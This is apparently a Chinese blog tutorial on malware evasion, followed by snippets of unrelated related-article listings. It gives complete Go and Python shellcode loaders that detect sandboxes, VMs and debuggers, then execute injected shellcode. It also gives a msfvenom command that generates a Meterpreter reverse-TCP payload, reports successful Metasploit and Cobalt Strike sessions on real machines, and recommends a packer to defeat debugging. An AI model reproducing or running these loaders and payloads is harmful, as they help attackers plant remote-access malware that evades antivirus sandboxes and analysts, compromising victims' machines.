免杀对抗-反沙盒+反调试
反VT-沙盒检测-Go&Python
介绍:
近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。
其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说沙盒就是为运行中的程序提供的隔离环境。
为了逃避沙箱/安全人员的检测,恶意软件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。
go语言
1.使用GoLang打开如下反沙盒go文件。
main.go:会检测电脑配置来判断是否是虚拟环境
packagemainimport("encoding/hex""golang.org/x/sys/windows""os""os/exec""path/filepath""runtime""strings""syscall""time""unsafe")//检测语言,依赖windows数据包,编译后会增加0.6M大小funccheck_language(){a,_:=windows.GetUserPreferredUILanguages(windows.MUI_LANGUAGE_NAME)//获取当前系统首选语言ifa[0]!="zh-CN"{os.Exit(1)}}funccheck_sandbox(){//1.延时运行timeSleep1,_:=timeSleep()//2.检测开机时间bootTime1,_:=bootTime()//3.检测物理内存physicalMemory1,_:=physicalMemory()//4.检测CPU核心数numberOfCPU1,_:=numberOfCPU()//5.检测临时文件数numberOfTempFiles1,_:=numberOfTempFiles()level:=timeSleep1+bootTime1+physicalMemory1+numberOfCPU1+numberOfTempFiles1//有五个等级,等级越趋向于5,越像真机//fmt.Println("level:",level)iflevel<4{os.Exit(1)}}//1.延时运行functimeSleep()(int,error){startTime:=time.Now()time.Sleep(5*time.Second)endTime:=time.Now()sleepTime:=endTime.Sub(startTime)ifsleepTime>=time.Duration(5*time.Second){//fmt.Println("睡眠时间为:",sleepTime)return1,nil}else{return0,nil}}//2.检测开机时间//许多沙箱检测完毕后会重置系统,我们可以检测开机时间来判断是否为真实的运行状况。funcbootTime()(int,error){varkernel=syscall.NewLazyDLL("Kernel32.dll")GetTickCount:=kernel.NewProc("GetTickCount")r,_,_:=GetTickCount.Call()ifr==0{return0,nil}ms:=time.Duration(r*1000*1000)tm:=time.Duration(30*time.Minute)//fmt.Println(ms,tm)ifms<tm{return0,nil}else{return1,nil}}//3、物理内存大小funcphysicalMemory()(int,error){varmod=syscall.NewLazyDLL("kernel32.dll")varproc=mod.NewProc("GetPhysicallyInstalledSystemMemory")varmemuint64proc.Call(uintptr(unsafe.Pointer(&mem)))mem=mem/1048576//fmt.Printf("物理内存为%dG\n",mem)ifmem<4{return0,nil//小于4GB返回0}return1,nil//大于4GB返回1}funcnumberOfCPU()(int,error){a:=runtime.NumCPU()//fmt.Println("CPU核心数为:",a)ifa<4{return0,nil//小于4核心数,返回0}else{return1,nil//大于4核心数,返回1}}funcnumberOfTempFiles()(int,error){conn:=os.Getenv("temp")//通过环境变量读取temp文件夹路径varkintifconn==""{//fmt.Println("未找到temp文件夹,或temp文件夹不存在")return0,nil}else{local_dir:=connerr:=filepath.Walk(local_dir,func(filenamestring,fios.FileInfo,errerror)error{iffi.IsDir(){returnnil}k++//fmt.Println("filename:",filename)//输出文件名字returnnil})//fmt.Println("Temp总共文件数量:",k)iferr!=nil{//fmt.Println("路径获取错误")return0,nil}}ifk<30{return0,nil}return1,nil}funccheck_virtual()(bool,error){//识别虚拟机model:=""varcmd*exec.Cmdcmd=exec.Command("cmd","/C","wmicpathWin32_ComputerSystemgetModel")stdout,err:=cmd.Output()iferr!=nil{returnfalse,err}model=strings.ToLower(string(stdout))ifstrings.Contains(model,"VirtualBox")||strings.Contains(model,"virtual")||strings.Contains(model,"VMware")||strings.Contains(model,"KVM")||strings.Contains(model,"Bochs")||strings.Contains(model,"HVMdomU")||strings.Contains(model,"Parallels"){returntrue,nil//如果是虚拟机则返回true}returnfalse,nil}funcPathExists(pathstring)(bool,error){_,err:=os.Stat(path)iferr==nil{returntrue,nil}ifos.IsNotExist(err){returnfalse,nil}returnfalse,err}funcfack(pathstring){b,_:=PathExists(path)ifb{os.Exit(1)}}funccheck_file(){fack("C:\\windows\\System32\\Drivers\\Vmmouse.sys")fack("C:\\windows\\System32\\Drivers\\vmtray.dll")fack("C:\\windows\\System32\\Drivers\\VMToolsHook.dll")fack("C:\\windows\\System32\\Drivers\\vmmousever.dll")fack("C:\\windows\\System32\\Drivers\\vmhgfs.dll")fack("C:\\windows\\System32\\Drivers\\vmGuestLib.dll")fack("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")fack("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")fack("C:\\windows\\System32\\Drivers\\VBoxSF.sys")fack("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")fack("C:\\windows\\System32\\vboxdisp.dll")fack("C:\\windows\\System32\\vboxhook.dll")fack("C:\\windows\\System32\\vboxoglerrorspu.dll")fack("C:\\windows\\System32\\vboxoglpassthroughspu.dll")fack("C:\\windows\\System32\\vboxservice.exe")fack("C:\\windows\\System32\\vboxtray.exe")fack("C:\\windows\\System32\\VBoxControl.exe")}varVirtualAlloc=syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")funcaaa(aunsafe.Pointer,buintptr,cuint32,dunsafe.Pointer)bool{ret,_,_:=VirtualAlloc.Call(uintptr(a),uintptr(b),uintptr(c),uintptr(d))returnret>0}funcRun(sc[]byte){fly:=func(){}varxxuint32if!aaa(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&fly))),unsafe.Sizeof(uintptr(0)),uint32(0x40),unsafe.Pointer(&xx)){}**(**uintptr)(unsafe.Pointer(&fly))=*(*uintptr)(unsafe.Pointer(&sc))varyyuint32aaa(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&yy))fly()}funcScFromHex(scHexstring)[]byte{varcharcode[]bytecharcode,_=hex.DecodeString(string(scHex))returncharcode}funcmain(){check_language()check_file()check,_:=check_virtual()ifcheck==true{os.Exit(1)}check_sandbox()sccode:=ScFromHex("生成的hex类型shellcode")Run(sccode)}2.启动msf,使用命令生成hex类型shellcode
命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=监听ip LPORT=4444 -f hex
将shellcode写入main.go文件中,运行生成exe程序
3.msf设置监听,在真机运行exe程序,msf成功上线
4.将exe程序放到虚拟机中无法运行,证明代码成功检测出当前处在虚拟环境中。
python语言
1.将如下反沙盒py代码使用py文件打包器打包成exe程序
Vt.py:
import ctypes,base64,os,psutil,timefrom multiprocessing import cpu_countdef check_file():vmfile=['C:\windows\System32\Drivers\Vmmouse.sys','C:\windows\System32\Drivers/vmtray.dll','C:\windows\System32\Drivers\VMToolsHook.dll','C:\windows\System32\Drivers/vmmousever.dll','C:\windows\System32\Drivers/vmhgfs.dll','C:\windows\System32\Drivers/vmGuestLib.dll','C:\windows\System32\Drivers\VBoxMouse.sys','C:\windows\System32\Drivers\VBoxGuest.sys','C:\windows\System32\Drivers\VBoxSF.sys','C:\windows\System32\Drivers\VBoxVideo.sys','C:\windows\System32/vboxdisp.dll','C:\windows\System32/vboxhook.dll','C:\windows\System32/vboxoglerrorspu.dll','C:\windows\System32/vboxoglpassthroughspu.dll','C:\windows\System32/vboxservice.exe','C:\windows\System32/vboxtray.exe','C:\windows\System32\VBoxControl.exe',]for data in vmfile:result=os.path.exists(data)if result:return 0return 1def check_virtual():r=os.popen('wmic path Win32_ComputerSystem get Model')text = r.read()if 'vmware' in text:return 0return 1def numberOfCPU():if int(format(cpu_count())) < 4:return 0return 1def physicalMemory():data = psutil.virtual_memory()total = data.total # 总内存,单位为byten=int(total/1024/1024/1024)+1if n < 4:return 0return 1if __name__ == '__main__':r=numberOfCPU()+physicalMemory()+check_virtual()+check_file()print(r)if r < 4:exit()else:sc=b'生成的shellcode'time.sleep(1)ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(sc), 0x1000, 0x40)time.sleep(1)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(sc), len(sc))time.sleep(1)handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)time.sleep(1)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)time.sleep(1)打包成功
2.真机运行exe程序,cs成功上线
3.将exe程序上传到虚拟机,exe程序无法运行。
反VT反调试-程序保护
1.将上线的exe程序使用ollydbg进行调试,可以正常调试
2.使用工具shielden对exe程序进行保护
下载:https://www.somode.com/softxz/716.html
启动工具,将exe程序拖入工具中。勾选如下选项,点击保护
3.将重新生成的受保护的exe程序再次使用ollydbg调试,可以看到已经不能正常调试了
4.在虚拟机中也无法在运行
相关文章:
免杀对抗-反沙盒+反调试
反VT-沙盒检测-Go&Python 介绍: 近年来,各类恶意软件层出不穷,反病毒软件也更新了各种检测方案以提高检率。 其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。简单来说…...
QTimer类的使用方法
本文介绍QTimer类的使用方法。 1.单次触发 在某些情况下,定时器只运行一次,可使用单次触发方式。 QTimer *timer new QTimer(this); connect(timer, &QTimer::timeout, this, &MainWindow::timeout); timer->setSingleShot(true); timer-…...
(三)行为模式:9、空对象模式(Null Object Pattern)(C++示例)
目录 1、空对象模式(Null Object Pattern)含义 2、空对象模式的主要涉及以下几个角色 3、空对象模式的应用场景 4、空对象模式的优缺点 (1)优点 (2)缺点 5、C实现空对象模式的实例 1、空对象模式&am…...
Django实战项目-学习任务系统-用户登录
第一步:先创建一个Django应用程序框架代码 1,先创建一个Django项目 django-admin startproject mysite将创建一个目录,其布局如下:mysite/manage.pymysite/__init__.pysettings.pyurls.pyasgi.pywsgi.py 2,再创建一个…...
【动手学深度学习-Pytorch版】Transformer代码总结
本文是纯纯的撸代码讲解,没有任何Transformer的基础内容~ 是从0榨干Transformer代码系列,借用的是李沐老师上课时讲解的代码。 本文是根据每个模块的实现过程来进行讲解的。如果您想获取关于Transformer具体的实现细节(不含代码)可…...
做外贸独立站选Shopify还是WordPress?
现在确实会有很多新人想做独立站,毕竟跨境电商平台内卷严重,平台规则限制不断升级,脱离平台“绑架”布局独立站,才能获得更多流量、订单、塑造品牌价值。然而,在选择建立外贸独立站的过程中,选择适合的建站…...
echarts的bug,在series里写tooltip,不起作用,要在全局先写tooltip:{}才起作用,如果在series里写的不起作用就写到全局里
echarts的bug,在series里写tooltip,不起作用,要在全局先写tooltip:{show:true}才起作用,如果在series里写的不起作用就写到全局里 series里写tooltip不起作用,鼠标悬浮在echarts图表上时不显示提示 你需要…...
jmeter分布式压测
一、什么是压力测试? 压力测试(Stress Test),也称为强度测试、负载测试,属于性能测试的范畴。 压力测试是模拟实际应用的软硬件环境及用户使用过程的系统负荷,长时间或超大负荷地运行被测软件系统ÿ…...
consulmanage部署
一、部署consul 使用yum方式部署consul yum install -y yum-utils yum-config-manager --add-repo https://rpm.releases.hashicorp.com/RHEL/hashicorp.repo yum -y install consul 执行以下命令获取uuid密钥并记录下来 uuidgen 编辑consul配置文件 vi /etc/consul.d/consul.h…...
大数据软件项目的验收流程
大数据软件项目的验收流程是确保项目交付符合预期需求和质量标准的关键步骤。以下是一般的大数据软件项目验收流程,希望对大家有所帮助。北京木奇移动技术有限公司,专业的软件外包开发公司,欢迎交流合作。 1.项目验收计划制定: 在…...
《第一行代码Andorid》阅读笔记-第一章
这篇文章是我自己的《第一行代码Andorid》的阅读笔记,虽然大量参考了别人已经写好的一些笔记和代码但是也有自己的提炼和新的问题在里面,我也会放上参考文章链接。 学习重点 Android系统的四大组件: (1)活动ÿ…...
Educational Codeforces Round 146 (Rated for Div. 2)(VP)
写个题解 A. Coins void solve(){ll n, k; cin >> n >> k;bl ok true;if (n &1 && k %2 0) ok false;print(ok ? yes : no); } B. Long Legs void solve(){db x, y; cin >> x >> y;if (x < y) swap(x, y);int t1 ceil(sqrt(x))…...
9.30国庆
消息队列完成进程间通信 #include <myhead.h>#define size sizeof(msg_ds)-sizeof(long) //正文大小//消息结构体 typedef struct {long msgtype; //消息类型char data[1024]; //消息正文 }msg_ds;//创建子线程构造体 void *task1(void *arg) {//创造第二个key值ke…...
java基础-第4章-面向对象(二)
一、static关键字 静态(static)可以修饰属性和方法。 称为静态属性(类属性)、静态方法(类方法)。 静态成员是全类所有对象共享的成员。 在全类中只有一份,不因创建多个对象而产生多份。 不必创…...
flex加 grid 布局笔记
<style> .flex-container { display: flex; height: 100%; /* 设置容器的高度 */ } .wide { display: flex; padding: 10px; border: 1px solid lightgray; text-align: center; justify-content: …...
最高评级!华为云CodeArts Board获信通院软件研发效能度量平台先进级认证
9月26日,华为云CodeArts Board获得了中国信通院《云上软件研发效能度量分级模型》的先进级最高级评估,达到了软件研发效能度量平台评估的通用效能度量能力、组织效能模型、项目效能模型、资源效能模型、个人效能模型、研发效能评价模型、项目管理域、开发…...
图像上传功能实现
一、后端 文件存放在images.path路径下 package com.like.common;import jakarta.servlet.ServletOutputStream; import jakarta.servlet.http.HttpServletResponse; import org.springframework.beans.factory.annotation.Value; import org.springframework.web.bind.annot…...
03_Node.js模块化开发
1 Node.js的基本使用 1.1 NPM nodejs安装完成后,会跟随着自动安装另外一个工具npm。 NPM的全称是Node Package Manager,是一个NodeJS包管理和分发工具,已经成为了非官方的发布Node模块(包)的标准。 2020年3月17日&…...
Nginx支持SNI证书,已经ssl_server_name的使用
整理了一些网上的资料,这里记录一下,供大家参考 什么是SNI? 传统的应用场景中,一台服务器对应一个IP地址,一个域名,使用一张包含了域名信息的证书。随着云计算技术的普及,在云中的虚拟机有了一…...
Hive【Hive(六)窗口函数】
窗口函数(window functions) 概述 定义 窗口函数能够为每行数据划分 一个窗口,然后对窗口范围内的数据进行计算,最后将计算结果返回给该行数据。 语法 窗口函数的语法主要包括 窗口 和 函数 两个部分。其中窗口用于定义计算范围…...
Met no ‘TRANSLATIONS’ entry in project
这里写自定义目录标题 问题描述:解决方法: 问题描述: 多工程项目,执行完update Translation生成了.ts文件,也用翻译工具翻译完了,执行release时,报错“Met no ‘TRANSLATIONS’ entry in proje…...
Leetcode901-股票价格跨度
一、前言 本题基于leetcode901股票价格趋势这道题,说一下通过java解决的一些方法。并且解释一下笔者写这道题之前的想法和一些自己遇到的错误。需要注意的是,该题最多调用 next 方法 10^4 次,一般出现该提示说明需要注意时间复杂度。 二、解决思路 ①…...
“传统文化宣传片+虚拟人动捕设备”前景如何?
在数字化时代的发展下,动捕设备的加入,让传播传统文化的虚拟人更具生动表现,拉近人们与传统文化的距离,通过虚拟人动作捕捉动画宣传片,引起更多人对传统文化的关注与传承。 *图片源于网络 深圳文博会创意短片《嗨ICIF…...
节假日moc服务数据:解决用户99%的IT问题
Hi~ 伙伴们,这个国庆假期过得怎么样? 节后第一个工作日如期而至, 忙碌是消除倦怠的最佳良药。 回顾8天假日moc工程师的一组服务数据, 处理事件184起,工单23条。 其中,较为典型案例如下: 1、福建某附属医院…...
WOL唤醒配置(以太网、PHY、MAC)
目录 wol 以太网 MAC PHY RMII 通信配置 总结 wol Wake-on-LAN简称WOL,WOL(网络唤醒) 是一种标准网络协议,它的功效在于让已经进入休眠状态或关机状态的计算机,透过局域网(多半为以太网ÿ…...
MySQL复制,约束条件,查询与安全控制
MySQL之复制 复制表 我有一个表 mysql> show tables; ------------------ | Tables_in_school | ------------------ | student | ------------------mysql> select * from student; -------------------------------------------- | id | name | sec |…...
Java ES 滚动查询
滚动查询(Scroll Query)是 Elasticsearch 提供的一种机制,用于处理大量数据的查询。它允许你在多个请求之间保持“游标”,以便在后续请求中获取更多的结果。 以下是滚动查询的基本工作原理: 1 初始查询: 客户端发送一…...
机器学习算法基础--KNN算法分类
文章目录 1.KNN算法原理介绍2.KNN分类决策原则3.KNN度量距离介绍3.1.闵可夫斯基距离3.2.曼哈顿距离3.3.欧式距离 4.KNN分类算法实现5.KNN分类算法效果6.参考文章与致谢 1.KNN算法原理介绍 KNN(K-Nearest Neighbor)工作原理: 在一个存在标签的…...
深入探究 C++ 编程中的资源泄漏问题
目录 1、GDI对象泄漏 1.1、何为GDI资源泄漏? 1.2、使用GDIView工具排查GDI对象泄漏 1.3、有时可能需要结合其他方法去排查 1.4、如何保证没有GDI对象泄漏? 2、进程句柄泄漏 2.1、何为进程句柄泄漏? 2.2、创建线程时的线程句柄泄漏 …...
BLE协议栈1-物理层PHY
从应届生开始做ble开发也差不读四个月的时间了,一直在在做上层的应用,对蓝牙协议栈没有过多的时间去了解,对整体的大方向概念一直是模糊的状态,在开发时也因此遇到了许多问题,趁有空去收集了一下资料来完成了本次专栏&…...
微信音乐做mp3下载网站/网络营销的八种方式
THCTERMINAL HANDLING CHARGE,碼頭操作費转载于:https://www.cnblogs.com/DTWolf/p/4681950.html...
html5网站开发论文/2022年大事热点新闻
当远程连接MySQL数据库的时候显示Can’t connect to MySQL server (10060);解决办法: 关闭windows防火墙即可解决该问题;...
网页制作模板甜品蛋糕/seo中文意思是
mysql-connector-java-8.0.23.jar在官网上下载进入官网下载地址:https://dev.mysql.com/downloads/connector/j/ 选择 (注:select Operating System这里一定要修改!!!) 下载 解压然后使用 …...
手机公司网站建设比较好的/搜索引擎快速排名推广
参考:http://scikit-learn.org/stable/modules/svm.html 在实际项目中,我们真的很少用到那些简单的模型,比如LR、kNN、NB等,虽然经典,但在工程中确实不实用。 今天我们关注在工程中用的相对较多的SVM。 SVM功能不少&a…...
武汉网站建设_网页设计_网站制作_网站建设公司_做企业网站公司/如何自己建个网站
“积极思维”更像是一个为完美人士所设计的梦幻。而“消极思维”则为那些内心尚不完美,还存在种种心理缺陷的人提供安全感和情感支持。 消极思维有时候会发挥出相当正面的力量 人们在生活里,总是会鼓励那些失去希望的人们:要想开点儿…...
网站上滚动条怎么做/百度一下百度网页官
前言 起因是我要在jquery的ajax中需要根据返回值来决定是否继续发起ajax请求,这是一个有条件的循环,符合条件就跳出。可以使用while循环的,但是想了想还是递归调用好用。 调用递归函数 递归函数大概就是这样的。不符合条件重新执行这个函数 f…...